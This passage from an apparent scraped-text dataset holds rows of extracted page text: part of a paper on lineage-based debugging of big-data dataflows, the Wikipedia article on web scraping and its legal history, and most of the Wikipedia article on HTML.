logs to find anomalies, 13 32 which can be tedious and time-consuming across several stages of a data-flow. Furthermore, these approaches work only when the data scientist can discover bad outputs. To debug analytics without known bad outputs, the data scientist need to analyze the data-flow for suspicious behavior in general. However, often, a user may not know the expected normal behavior and cannot specify predicates. This section describes a debugging methodology for retrospectively analyzing lineage to identify faulty actors in a multi-stage data-flow. We believe that sudden changes in an actor's behavior, such as its average selectivity, processing rate or output size, is characteristic of an anomaly. Lineage can reflect such changes in actor behavior over time and across different actor instances. Thus, mining lineage to identify such changes can be useful in debugging faulty actors in a data-flow. The second problem i.e. the existence of outliers can also be identified by running the data-flow step wise and looking at the transformed outputs. The data scientist finds a subset of outputs that are not in accordance to the rest of outputs. The inputs which are causing these bad outputs are the outliers in the data. This problem can be solved by removing the set of outliers from the data and replaying the entire data-flow. It can also be solved by modifying the machine learning algorithm by adding, removing or moving actors in the data-flow. The changes in the data-flow are successful if the replayed data-flow does not produce bad outputs. Even though the use of data lineage approaches is a novel way of debugging of big data pipelines, the process is not simple. The challenges include scalability of the lineage store, fault tolerance of the lineage store, accurate capture of lineage for black box operators and many others. These challenges must be considered carefully and trade offs between them need to be evaluated to make a realistic design for data lineage capture. DISC systems are primarily batch processing systems designed for high throughput. They execute several jobs per analytics, with several tasks per job. The overall number of operators executing at any time in a cluster can range from hundreds to thousands depending on the cluster size. Lineage capture for these systems must be able scale to both large volumes of data and numerous operators to avoid being a bottleneck for the DISC analytics. Lineage capture systems must also be fault tolerant to avoid rerunning data flows to capture lineage. At the same time, they must also accommodate failures in the DISC system. To do so, they must be able to identify a failed DISC task and avoid storing duplicate copies of lineage between the partial lineage generated by the failed task and duplicate lineage produced by the restarted task. A lineage system should also be able to gracefully handle multiple instances of local lineage systems going down. This can be achieved by storing replicas of lineage associations in multiple machines. The replica can act like a backup in the event of the real copy being lost. Lineage systems for DISC dataflows must be able to capture accurate lineage across black-box operators to enable fine-grain debugging. Current approaches to this include Prober, which seeks to find the minimal set of inputs that can produce a specified output for a black-box operator by replaying the data-flow several times to deduce the minimal set, 33 and dynamic slicing, as used by Zhang et al. 34 to capture lineage for NoSQL operators through binary rewriting to compute dynamic slices. Although producing highly accurate lineage, such techniques can incur significant time overheads for capture or tracing, and it may be preferable to instead trade some accuracy for better performance. Thus, there is a need for a lineage collection system for DISC dataflows that can capture lineage from arbitrary operators with reasonable accuracy, and without significant overheads in capture or tracing. Tracing is essential for debugging, during which, a user can issue multiple tracing queries. Thus, it is important that tracing has fast turnaround times. Ikeda et al. 26 can perform efficient backward tracing queries for MapReduce dataflows, but are not generic to different DISC systems and do not perform efficient forward queries. Lipstick, 35 a lineage system for Pig, 36 while able to perform both backward and forward tracing, is specific to Pig and SQL operators and can only perform coarse-grain tracing for black-box operators. Thus, there is a need for a lineage system that enables efficient forward and backward tracing for generic DISC systems and dataflows with black-box operators. Replaying only specific inputs or portions of a data-flow is crucial for efficient debugging and simulating what-if scenarios. Ikeda et al. present a methodology for lineage-based refresh, which selectively replays updated inputs to recompute affected outputs. 37 This is useful during debugging for re-computing outputs when a bad input has been fixed. However, sometimes a user may want to remove the bad input and replay the lineage of outputs previously affected by the error to produce error-free outputs. We call this exclusive replay. Another use of replay in debugging involves replaying bad inputs for step-wise debugging (called selective replay). Current approaches to using lineage in DISC systems do not address these. Thus, there is a need for a lineage system that can perform both exclusive and selective replays to address different debugging needs. One of the primary debugging concerns in DISC systems is identifying faulty operators. In long dataflows with several hundreds of operators or tasks, manual inspection can be tedious and prohibitive. Even if lineage is used to narrow the subset of operators to examine, the lineage of a single output can still span several operators. There is a need for an inexpensive automated debugging system, which can substantially narrow the set of potentially faulty operators, with reasonable accuracy, to minimize the amount of manual examination required. |
53 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-19 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
54 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/HTML | Hypertext Markup Language (HTML) is the standard markup language for documents designed to be displayed in a web browser. It defines the content and structure of web content. It is often assisted by technologies such as Cascading Style Sheets (CSS) and scripting languages such as JavaScript. Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for its appearance. HTML elements are the building blocks of HTML pages. With HTML constructs, images and other objects such as interactive forms may be embedded into the rendered page. HTML provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists, links, quotes, and other items. HTML elements are delineated by tags, written using angle brackets. Tags such as img and input directly introduce content into the page. Other tags such as p and p surround and provide information about document text and may include sub-element tags. Browsers do not display the HTML tags but use them to interpret the content of the page. HTML can embed programs written in a scripting language such as JavaScript, which affects the behavior and content of web pages. The inclusion of CSS defines the look and layout of content. The World Wide Web Consortium (W3C), former maintainer of the HTML and current maintainer of the CSS standards, has encouraged the use of CSS over explicit presentational HTML since 1997. update 2 A form of HTML, known as HTML5, is used to display video and audio, primarily using the canvas element, together with JavaScript. In 1980, physicist Tim Berners-Lee, a contractor at CERN, proposed and prototyped ENQUIRE, a system for CERN researchers to use and share documents. In 1989, Berners-Lee wrote a memo proposing an Internet-based hypertext system. 3 Berners-Lee specified HTML and wrote the browser and server software in late 1990. That year, Berners-Lee and CERN data systems engineer Robert Cailliau collaborated on a joint request for funding, but the project was not formally adopted by CERN. In his personal notes of 1990, Berners-Lee listed "some of the many areas in which hypertext is used"; an encyclopedia is the first entry. 4 The first publicly available description of HTML was a document called "HTML Tags", 5 first mentioned on the Internet by Tim Berners-Lee in late 1991. 6 7 It describes 18 elements comprising the initial, relatively simple design of HTML. Except for the hyperlink tag, these were strongly influenced by SGMLguid, an in-house Standard Generalized Markup Language (SGML) based documentation format at CERN. Eleven of these elements still exist in HTML 4. 8 HTML is a markup language that web browsers use to interpret and compose text, images, and other material into visible or audible web pages. Default characteristics for every item of HTML markup are defined in the browser, and these characteristics can be altered or enhanced by the web page designer's additional use of CSS. Many of the text elements are mentioned in the 1988 ISO technical report TR 9537 Techniques for using SGML, which describes the features of early text formatting languages such as that used by the RUNOFF command developed in the early 1960s for the CTSS (Compatible Time-Sharing System) operating system. These formatting commands were derived from the commands used by typesetters to manually format documents. However, the SGML concept of generalized markup is based on elements (nested annotated ranges with attributes) rather than merely print effects, with separate structure and markup. HTML has been progressively moved in this direction with CSS. Berners-Lee considered HTML to be an application of SGML. It was formally defined as such by the Internet Engineering Task Force (IETF) with the mid 1993 publication of the first proposal for an HTML specification, the "Hypertext Markup Language (HTML) Internet Draft by Berners-Lee and Dan Connolly, which included an SGML Document type definition to define the syntax. 9 10 The draft expired after six months, but was notable for its acknowledgment of the NCSA Mosaic browser's custom tag for embedding in-line images, reflecting the IETF's philosophy of basing standards on successful prototypes. Similarly, Dave Raggett's competing Internet Draft, "HTML (Hypertext Markup Format) , from late 1993, suggested standardizing already-implemented features like tables and fill-out forms. 11 After the HTML and HTML drafts expired in early 1994, the IETF created an HTML Working Group. In 1995, this working group completed "HTML 2.0", the first HTML specification intended to be treated as a standard against which future implementations should be based. 12 Further development under the auspices of the IETF was stalled by competing interests. Since 1996, update the HTML specifications have been maintained, with input from commercial software vendors, by the World Wide Web Consortium (W3C). 13 In 2000, HTML became an international standard (ISO IEC 15445:2000). HTML 4.01 was published in late 1999, with further errata published through 2001. In 2004, development began on HTML5 in the Web Hypertext Application Technology Working Group (WHATWG), which became a joint deliverable with the W3C in 2008, and was completed and standardized on 28 October 2014. 14 XHTML is a separate language that began as a reformulation of HTML 4.01 using XML 1.0. It is now referred to as the XML syntax for HTML and is no longer being developed as a separate standard. 58 On 28 May 2019, the W3C announced that WHATWG would be the sole publisher of the HTML and DOM standards. 65 66 67 68 The W3C and WHATWG had been publishing competing standards since 2012. While the W3C standard was identical to the WHATWG in 2007 the standards have since progressively diverged due to different design decisions. 69 The WHATWG "Living Standard" had been the de facto web standard for some time. 70 HTML markup consists of several key components, including those called tags (and their attributes), character-based data types, character references and entity references. HTML tags most commonly come in pairs like h1 and h1 , although some represent empty elements and so are unpaired, for example img . The first tag in such a pair is the start tag, and the second is the end tag (they are also called opening tags and closing tags). Another important component is the HTML document type declaration, which triggers standards mode rendering. The following is an example of the classic "Hello, World program: The text between html and html describes the web page, and the text between body and body is the visible page content. The markup text title This is a title title defines the browser page title shown on browser tabs and window titles and the tag div defines a division of the page used for easy styling. Between head and head , a meta element can be used to define webpage metadata. The Document Type Declaration DOCTYPE html is for HTML5. If a declaration is not included, various browsers will revert to "quirks mode" for rendering. 71 HTML documents imply a structure of nested HTML elements. These are indicated in the document by HTML tags, enclosed in angle brackets thus: p . 72 better source needed In the simple, general case, the extent of an element is indicated by a pair of tags: a "start tag" p and "end tag" p . The text content of the element, if any, is placed between these tags. Tags may also enclose further tag markup between the start and end, including a mixture of tags and text. This indicates further (nested) elements, as children of the parent element. The start tag may also include the element's attributes within the tag. These indicate other information, such as identifiers for sections within the document, identifiers used to bind style information to the presentation of the document, and for some tags such as the img used to embed images, the reference to the image resource in the format like this: img src "example.com example.jpg" Some elements, such as the line break br do not permit any embedded content, either text or further tags. These require only a single empty tag (akin to a start tag) and do not use an end tag. Many tags, particularly the closing end tag for the very commonly used paragraph element p , are optional. An HTML browser or other agent can infer the closure for the end of an element from the context and the structural rules defined by the HTML standard. These rules are complex and not widely understood by most HTML authors. The general form of an HTML element is therefore: tag attribute1 "value1" attribute2 "value2" 'content' tag . Some HTML elements are defined as empty elements and take the form tag attribute1 "value1" attribute2 "value2" . Empty elements may enclose no content, for instance, the br tag or the inline img tag. The name of an HTML element is the name used in the tags. The end tag's name is preceded by a slash character, , and that in empty elements the end tag is neither required nor allowed. If attributes are not mentioned, default values are used in each case. Header of the HTML document: head ... head . The title is included in the head, for example: HTML headings are defined with the h1 to h6 tags with H1 being the highest (or most important) level and H6 the least: The effects are: CSS can substantially change the rendering. Paragraphs: br . The difference between br and p is that br breaks a line without altering the semantic structure of the page, whereas p sections the page into paragraphs. The element br is an empty element in that, although it may have attributes, it can take no content and it may not have an end tag. This is a link in HTML. To create a link the a tag is used. The href attribute holds the URL address of the link. There are many possible ways a user can give input s like: Comments: Comments can help in the understanding of the markup and do not display in the webpage. There are several types of markup elements used in HTML: Most of the attributes of an element are name value pairs, separated by and written within the start tag of an element after the element's name. The value may be enclosed in single or double quotes, although values consisting of certain characters can be left unquoted in HTML (but not XHTML). 74 75 Leaving attribute values unquoted is considered unsafe. 76 In contrast with name-value pair attributes, there are some attributes that affect the element simply by their presence in the start tag of the element, 6 like the ismap attribute for the img element. 77 There are several common attributes that may appear in many elements : The abbreviation element, abbr, can be used to demonstrate some of these attributes: This example displays as HTML; in most browsers, pointing the cursor at the abbreviation should display the title text "Hypertext Markup Language. Most elements take the language-related attribute dir to specify text direction, such as with "rtl" for right-to-left text in, for example, Arabic, Persian or Hebrew. 78 As of version 4.0, HTML defines a set of 252 character entity references and a set of 1,114,050 numeric character references, both of which allow individual characters to be written via simple markup, rather than literally. A literal character and its markup counterpart are considered equivalent and are rendered identically. The ability to "escape" characters in this way allows for the characters and (when written as lt; and amp;, respectively) to be interpreted as character data, rather than markup. For example, a literal normally indicates the start of a tag, and normally indicates the start of a character entity reference or numeric character reference; writing it as amp; or x26; or 38; allows to be included in the content of an element or in the value of an attribute. The double-quote character ( ), when not used to quote an attribute value, must also be escaped as quot; or x22; or 34; when it appears within the attribute value itself. Equivalently, the single-quote character ( ), when not used to quote an attribute value, must also be escaped as x27; or 39; (or as apos; in HTML5 or XHTML documents 79 80 ) when it appears within the attribute value itself. If document authors overlook the need to escape such characters, some browsers can be very forgiving and try to use context to guess their intent. The result is still invalid markup, which makes the document less accessible to other browsers and to other user agents that may try to parse the document for search and indexing purposes for example. Escaping also allows for characters that are not easily typed, or that are not available in the document's character encoding, to be represented within the element and attribute content. For example, the acute-accented e ( ), a character typically found only on Western European and South American keyboards, can be written in any HTML document as the entity reference eacute; or as the numeric references xE9; or 233;, using characters that are available on all keyboards and are supported in all character encodings. Unicode character encodings such as UTF 8 are compatible with all modern browsers and allow direct access to almost all the characters of the world's writing systems. 81 HTML defines several data types for element content, such as script data and stylesheet data, and a plethora of types for attribute values, including IDs, names, URIs, numbers, units of length, languages, media descriptors, colors, character encodings, dates and times, and so on. All of these data types are specializations of character data. HTML documents are required to start with a Document type declaration (informally, a "doctype"). In browsers, the doctype helps to define the rendering mode—particularly whether to use quirks mode. The original purpose of the doctype was to enable the parsing and validation of HTML documents by SGML tools based on the Document type definition (DTD). The DTD to which the DOCTYPE refers contains a machine-readable grammar specifying the permitted and prohibited content for a document conforming to such a DTD. Browsers, on the other hand, do not implement HTML as an application of SGML and as consequence do not read the DTD. HTML5 does not define a DTD; therefore, in HTML5 the doctype declaration is simpler and shorter: 82 An example of an HTML 4 doctype This declaration references the DTD for the "strict" version of HTML 4.01. SGML-based validators read the DTD in order to properly parse the document and to perform validation. In modern browsers, a valid doctype activates standards mode as opposed to quirks mode. In addition, HTML 4.01 provides Transitional and Frameset DTDs, as explained below. The transitional type is the most inclusive, incorporating current tags as well as older or "deprecated" tags, with the Strict DTD excluding deprecated tags. The frameset has all tags necessary to make frames on a page along with the tags included in transitional type. 83 Semantic HTML is a way of writing HTML that emphasizes the meaning of the encoded information over its presentation (look). HTML has included semantic markup from its inception, 84 but has also included presentational markup, such as font , i and center tags. There are also the semantically neutral div and span tags. Since the late 1990s, when Cascading Style Sheets were beginning to work in most browsers, web authors have been encouraged to avoid the use of presentational HTML markup with a view to the separation of content and presentation. 85 In a 2001 discussion of the Semantic Web, Tim Berners-Lee and others gave examples of ways in which intelligent software "agents" may one day automatically crawl the web and find, filter, and correlate previously unrelated, published facts for the benefit of human users. 86 Such agents are not commonplace even now, but some of the ideas of Web 2.0, mashups and price comparison websites may be coming close. The main difference between these web application hybrids and Berners-Lee's semantic agents lies in the fact that the current aggregation and hybridization of information is usually designed by web developers, who already know the web locations and the API semantics of the specific data they wish to mash, compare and combine. An important type of web agent that does crawl and read web pages automatically, without prior knowledge of what it might find, is the web crawler or search-engine spider. These software agents are dependent on the semantic clarity of web pages they find as they use various techniques and algorithms to read and index millions of web pages a day and provide web users with search facilities without which the World Wide Web's usefulness would be greatly reduced. In order for search engine spiders to be able to rate the significance of pieces of text they find in HTML documents, and also for those creating mashups and other hybrids as well as for more automated agents as they are developed, the semantic structures that exist in HTML need to be widely and uniformly applied to bring out the meaning of the published text. 87 Presentational markup tags are deprecated in current HTML and XHTML recommendations. The majority of presentational features from previous versions of HTML are no longer allowed as they lead to poorer accessibility, higher cost of site maintenance, and larger document sizes. 88 Good semantic HTML also improves the accessibility of web documents (see also Web Content Accessibility Guidelines). For example, when a screen reader or audio browser can correctly ascertain the structure of a document, it will not waste the visually impaired user's time by reading out repeated or irrelevant information when it has been marked up correctly. HTML documents can be delivered by the same means as any other computer file. However, they are most often delivered either by HTTP from a web server or by email. The World Wide Web is composed primarily of HTML documents transmitted from web servers to web browsers using the Hypertext Transfer Protocol (HTTP). However, HTTP is used to serve images, sound, and other content, in addition to HTML. To allow the web browser to know how to handle each document it receives, other information is transmitted along with the document. This meta data usually includes the MIME type (e.g., text html or application xhtml xml) and the character encoding (see Character encodings in HTML). In modern browsers, the MIME type that is sent with the HTML document may affect how the document is initially interpreted. A document sent with the XHTML MIME type is expected to be well-formed XML; syntax errors may cause the browser to fail to render it. The same document sent with the HTML MIME type might be displayed successfully since some browsers are more lenient with HTML. The W3C recommendations state that XHTML 1.0 documents that follow guidelines set forth in the recommendation's Appendix C may be labeled with either MIME Type. 89 XHTML 1.1 also states that XHTML 1.1 documents should 90 be labeled with either MIME type. 91 Most graphical email clients allow the use of a subset of HTML (often ill-defined) to provide formatting and semantic markup not available with plain text. This may include typographic information like colored headings, emphasized and quoted text, inline images and diagrams. Many such clients include both a GUI editor for composing HTML e-mail messages and a rendering engine for displaying them. Use of HTML in e-mail is criticized by some because of compatibility issues, because it can help disguise phishing attacks, because of accessibility issues for blind or visually impaired people, because it can confuse spam filters and because the message size is larger than plain text. The most common filename extension for files containing HTML is .html. A common abbreviation of this is .htm, which originated because some early operating systems and file systems, such as DOS and the limitations imposed by FAT data structure, limited file extensions to three letters. 92 An HTML Application (HTA; file extension .hta) is a Microsoft Windows application that uses HTML and Dynamic HTML in a browser to provide the application's graphical interface. A regular HTML file is confined to the security model of the web browser's security, communicating only to web servers and manipulating only web page objects and site cookies. An HTA runs as a fully trusted application and therefore has more privileges, like creation editing removal of files and Windows Registry entries. Because they operate outside the browser's security model, HTAs cannot be executed via HTTP, but must be downloaded (just like an EXE file) and executed from local file system. Since its inception, HTML and its associated protocols gained acceptance relatively quickly. However, no clear standards existed in the early years of the language. Though its creators originally conceived of HTML as a semantic language devoid of presentation details, 93 practical uses pushed many presentational elements and attributes into the language, driven largely by the various browser vendors. The latest standards surrounding HTML reflect efforts to overcome the sometimes chaotic development of the language 94 and to create a rational foundation for building both meaningful and well-presented documents. To return HTML to its role as a semantic language, the W3C has developed style languages such as CSS and XSL to shoulder the burden of presentation. In conjunction, the HTML specification has slowly reined in the presentational elements. There are two axes differentiating various variations of HTML as currently specified: SGML-based HTML versus XML-based HTML (referred to as XHTML) on one axis, and strict versus transitional (loose) versus frameset on the other axis. One difference in the latest when? HTML specifications lies in the distinction between the SGML-based specification and the XML-based specification. The XML-based specification is usually called XHTML to distinguish it clearly from the more traditional definition. However, the root element name continues to be "html" even in the XHTML-specified HTML. The W3C intended XHTML 1.0 to be identical to HTML 4.01 except where limitations of XML over the more complex SGML require workarounds. Because XHTML and HTML are closely related, they are sometimes documented in parallel. In such circumstances, some authors conflate the two names as (X)HTML or X(HTML). Like HTML 4.01, XHTML 1.0 has three sub-specifications: strict, transitional, and frameset. Aside from the different opening declarations for a document, the differences between an HTML 4.01 and XHTML 1.0 document—in each of the corresponding DTDs—are largely syntactic. The underlying syntax of HTML allows many shortcuts that XHTML does not, such as elements with optional opening or closing tags, and even empty elements which must not have an end tag. By contrast, XHTML requires all elements to have an opening tag and a closing tag. XHTML, however, also introduces a new shortcut: an XHTML tag may be opened and closed within the same tag, by including a slash before the end of the tag like this: br . The introduction of this shorthand, which is not used in the SGML declaration for HTML 4.01, may confuse earlier software unfamiliar with this new convention. A fix for this is to include a space before closing the tag, as such: br . 95 To understand the subtle differences between HTML and XHTML, consider the transformation of a valid and well-formed XHTML 1.0 document that adheres to Appendix C (see below) into a valid HTML 4.01 document. Making this translation requires the following steps: Those are the main changes necessary to translate a document from XHTML 1.0 to HTML 4.01. To translate from HTML to XHTML would also require the addition of any omitted opening or closing tags. Whether coding in HTML or XHTML it may just be best to always include the optional tags within an HTML document rather than remembering which tags can be omitted. A well-formed XHTML document adheres to all the syntax requirements of 